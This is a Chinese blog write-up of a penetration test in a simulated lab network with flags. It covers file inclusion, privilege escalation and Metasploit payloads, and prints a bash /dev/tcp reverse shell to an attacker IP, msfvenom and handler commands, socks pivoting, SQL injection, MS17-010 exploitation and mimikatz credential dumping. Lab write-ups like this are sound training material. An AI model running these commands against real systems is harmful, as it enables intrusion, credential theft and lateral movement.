记一次模拟环境的渗透记录

    平时不怎么习惯做记录,导致很多时候在实际渗透中,遇到了某些问题的时候,还得去咨询度娘,谷锅,所以,现在决定好好纠正一下这个问题,同时也希望分享给爱好安全的同学们。

    这个渗透实验做了蛮久了,当时做的时候呢,也就做了点简单的记录。emmmm,废话也不多说了,开始进入正题吧!

    这是我画的一个十分拙劣的拓扑图!!!!!

拓扑图

    1.我们目前能访问的就只有192.168.5.10这个网站,进入网站后,经过简单的浏览页面,可以发现,存在文件包含,关于文件包含的利用方法有很多,这里我也就不做过多阐述了。

    2.现在就来测试一下是否存在漏洞,在这里我使用的是PHP的伪协议,可以很直观的看到,这里确实是存在漏洞的

    3.确定存在漏洞之后,直接使用远程文件包含来获取shell,因为是实验环境,所以直接在本地开启http服务,并在网站目录下,创建一个一句话脚本,注意这个脚本后缀不能是被php所解析的后缀。

    4.使用菜刀进行连接,地址就填远程文件包含的那个地址

    5.连接终端,查询一些基本信息,原谅我连whoami都打错了一次,233333,可以看到是一个低权限用户,在查看内核,使用对应的exp进行提权

    6.因为这个菜刀的终端用起来不太方便,所以我在做提权的时候,做了一次反弹shell,不过忘记截图了,具体的命令是这样的

目标端:/bin/bash/ -i > /dev/tcp/192/168.5.107/7777 0<&1 2>&1

攻击端:nc -lvnp 7777

    7.在获取反弹的shell之后,就可以使用对应的exp进行提权了,不过需要注意的事,上传exp之后,需要查看是否有运行权限,如果没有运行权限的话,使用 chmod u+x 文件名 赋予其可执行权限。

    8.在提权成功之后,我直接创建一个用户,并添加到root组,登陆ssh

9.因为是需要做内网渗透,那么不可或缺神器的就是MSF,首先生成一个MSF的后门

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.5.107 LPORT=4444 -f elf >shell.elf

    开启监听:

    use exploit/multi/handler

    set PAYLOAD linux/x86/meterpreter/reverse_tcp

    set LHOST 0.0.0.0

    exploit

    10.已经得到反弹回来的shell,那么现在应该做的就是添加路由对其内网进行探测

添加路由

    11.在对内网探测的时候,我偷了个懒,直接上传了nmap的源码到边界服务器,不过在实战中可不能这么做。以下就是192.168.6.0/24网段中的机器,OK,现在来逐个击破

    12.可以看到,16,17这个两个IP开放了80端口,但是其处于内网之中,我们是无法访问到的,那么这个时候,就可以使用ew反手给它一套连招,让它乖乖就范。

    在边界服务器,开启socks代理 ./ew -s ssocksd -l 1080

13.我使用的代理工具SocksCap,添加服务器:192.168.5.10,连接socks服务,便可访问其内网了,这款工具我个人感觉挺好用的。大家有兴趣的话,可以试一试。

14.访问192.168.6.16这个内网的80端口后,发现没有任何可以利用的地方,但是我突然看到之前的扫描结果,发现开放了8080端口,这个我相信大家都很熟悉吧,一进去,果然就是tomcat的主页,通过弱口令,成功进入到了配置页面。直接进去正题,找到war包上传地点,本地编译war包,上传,拿到shell。

    因为很多tomcat部署的时候,都是高权限用户部署的,所以其默认继承于root,不需要进行提权。

    拿到flag,其实每个站点都有两个flag,不过我很多都忘记截图了,手动滑稽- -!

15.开始渗透192.168.6.17这个站点,是一个内部OA系统,尝试爆破没有成功,目录扫描没有可以用页面,无奈之下,上了wvs漏扫,找到一个sql注入点。这个页面扫描目录的时候,也扫出来过,但是没上wvs的时候,我怎么也没想到这里会存在注入 = =

16.直接使用sqlmap进行注入,这里需要使用代理,因为之前socks断了一次,所以我换了个端口

17.拿到管理员账号,随手往MD5网站一丢,解密出来密码为:37s984pass,同时还在数据库中找到了另外一个flag

    Database: my_oa

    Table: admin

    [1 entry]

    +----+----------------------------------+----------+

    | id | password                        | username |

    +----+----------------------------------+----------+

    | 1  | 29acd667cdbee1116d365727ca6821d3 | admin    |

    +----+----------------------------------+----------+

18.本来想尝试直接用sqlmap写shell的,但是发现没有写入的权限,所以就放弃了,拿到密码,登陆OA管理系统,找到文件上传页面,直接上传php马,没有任何返回信息,然后我又上传了一次正常的图片,发现其命名规则貌似是根据系统返回时间来进行文件重命名的。

19.这个时候直接使用burp抓包上传,这里还是需要注意,burp也是需要使用边界服务器的socks代理的,不然也无法直接抓包上传的。这里重新上传一次大马,根据返回时间,访问大马

20.在查看网卡的时候,发现没有更深层次的主机的,那我也就不用提权了,翻阅目录拿到flag走人

21.接下来就是192.168.6.200这个主机了,看到445端口,第一反应就是ms17-010,刚刚我们已经做过路由了,那么直接执行 

    use exploit windows/smb/ms17_010_psexec

    show PAYLOAD

    找到下面箭头所指的这个payload

   22.设置目标机ip为192.168.6.200 ,设置反弹shell的ip与端口为我们控制的服务器

  23.在执行run之前,先在已经控制的边界服务器(192.168.6.10)上,用nc监听4555端口,可以看到,已经成功的将192.168.6.200的shell反弹回来

25.既然已经拿到高权限shell了,先添加一个用户再说

26.使用一些常用的域命令,收集一些信息

查看用户所属域
查询域管理

27.使用新创建的用户,登陆对方3389,因为是域环境,所以在连接3389的时候需要添加域的名称

28.上传mimikatz到192.168.5.10这个边界服务器之后,再下载下来,并且,虽然当前账号是在admin用户组中,但是mimikatz必须要最高权限运行。所以,在这里我也上传了一个MS14-058的exp,用来执行mimikatz

    可以看到mimikatz已经成功执行了

运气也比较好,抓到了域管理的密码

29.在使用抓取到的域管理的密码登陆当前主机,拿到flag

30.查看一下网卡信息,可以看到,还有内网

31.查看网络,尝试连接win那台主机,发现对方,为开启3389,但是我们现在有域控密码,直接使用IPC$进行连接,在配合开启3389的vbs脚本,直接打开对方3389,但是我忘记截图了,不过这里有个连接可以参考一下:https://wenku.baidu.com/view/f965f6ece009581b6bd9eb2c.html

32.登陆成功,拿到flag

至此这个实验就算基本完成了✿✿ヽ(°▽°)ノ✿。本人技术不精,如有错误的地方,欢迎指正。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,491评论 5 459
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,856评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,745评论 0 319
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,196评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,073评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,112评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,531评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,215评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,485评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,578评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,356评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,215评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,583评论 3 299
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,898评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,174评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,497评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,697评论 2 335

推荐阅读更多精彩内容